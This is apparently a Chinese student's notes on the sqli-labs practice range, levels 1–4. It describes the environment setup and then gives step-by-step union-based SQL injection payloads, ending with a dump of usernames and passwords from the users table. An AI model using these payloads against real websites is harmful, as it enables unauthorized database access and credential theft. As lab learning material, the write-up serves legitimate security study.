SQL-labs练习记录(1~4)【入门】
SQL-labs练习记录(1~4)【入门】
写在前面
提升一下SQL注入能力,写点笔记。
一开始的环境配置可以说是多灾多难,首先是要调低php版本或者改靶场源文件,一开始是更改源文件的方式,要将所有带mysql的函数都换成mysqli的缀,同时会有一些参数上的变化,要查询相关函数来修改,但是最后还是在setup环境出现了问题。
最后选用的是调低版本的方案,在5.5以下就没问题了。
然后是靶场配置文件,要注意密码和数据库设置一致。
然后我以为成功了(显示了与其他文章一样的界面)却发现用不了,答案不匹配,甚至回显缺失,这里原因不明,可能与原电脑安装的数据库冲突。
最后在学长的帮助下,通过查看数据库图形化界面,查看实时setup过程,确实有出错产生,没有正确自动建立数据库及表单,手动放入表单,并且在特定的’security’库下建立才成功。
至此,终于可以开始了。
不得不提到的一点是,这篇文章使用到了一个插件,是firefox中的hackbar,在这里不仅会让我们的输入更加直观,不必在网址栏慢慢翻找之外,同时提供了编解码,SQL语句帮助的功能,非常好用,使用时要降低版本并禁止更新。
Less 1
首先输入1能够正常回显
开始探测:输入
?id=1 and 1=2
看是字符型还是整形,我们的查询地方是放在一对单引号中的。我们这样构造的原因是因为php的强制转换特性,用的是’==‘、’!=‘比较,类型不同仍旧可以比较,在这里如果页面返回正常,就说明默认转换过了,会转换为布尔类型,那么很有可能就是字符型注入。如果不正确,就说明很可能是整形注入
现在验证一下:
?id=1' and '1'='1
?id=1' and '1'='2
前者正确,后者语法正确,查询错误。那么确定为字符型,可以进行下一步了。
探测显示列数(表单数据可能很多,但列数一般并不多):
?id=1' order by 4 --+
显示没有第四列,减少参数值
?id=1' order by 3 --+
显示正常。说明有三列。
探测回显位置:
?id=-1' union select 1,2,3 --+
说明数据就从对应位置可以显示,我们要爆的数据就会显示在那里。
这里推荐在第三个位置,因为第二个位置会因为结束符的原因需要单独加上select(),比较麻烦。
首先查看当前数据库位置:
(union注意要使前面为假,这与or的原理是类似的)
?id=-1' union select 1,2,database() --+
查看所有数据库:
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
查看你需要的库的所有表:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
这里由于我们一开始查询到我们所在位置为’security’所以我们查security库
查看你需要的表(users)的列:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
筛选条件就承接了上个命令中的table_name
查看敏感数据:
?id=-1' union select 1,2,group_concat(concat(username,'~',password)) from security.users --+
由于我们有了上面的信息,那么我们可以直接写敏感数据的库和表名。
到这里,我们就完成了一个注入流程,从测试到查看敏感数据。
Less 2
按照上文方法进行测试,发现在这里就已经不能正确显示页面了。
?id=1 and 1=2
说明这很有可能是整形注入。也就是说参值为整形,不用闭合本来存在的 $id='xxx’字符型单引号。直接输在后面作为命令执行。
直接操作即可,甚至不用注释掉后面。这里直接放上少量截图,略过。
Less 3
一样的进行探测,发现报错信息有点不对劲,突然出现了一个括号的报错,说明原语句被改变了,那么在构造闭合时要闭合好括号。
?id=1') order by 4 --+
除了闭合的不同,其他就与前文一样了。
Less 4
一样开始探测,会发现它不报错了,只会在未查询到信息与查询到信息之间变化,说明探测也是一个不简单的任务,但是我们可以明显感觉到这里时一个字符型注入,因为如果是整形我们使用单引号之类很容易报错。
能够是字符而又不会损坏sql语句,同时又是字符型,那就是双引号了。(将单引号也带入查询)
报出错误
根据错误的信息,我们可以知道,这里自带了双引号和括号,那么构造闭合就行。其他的就无了。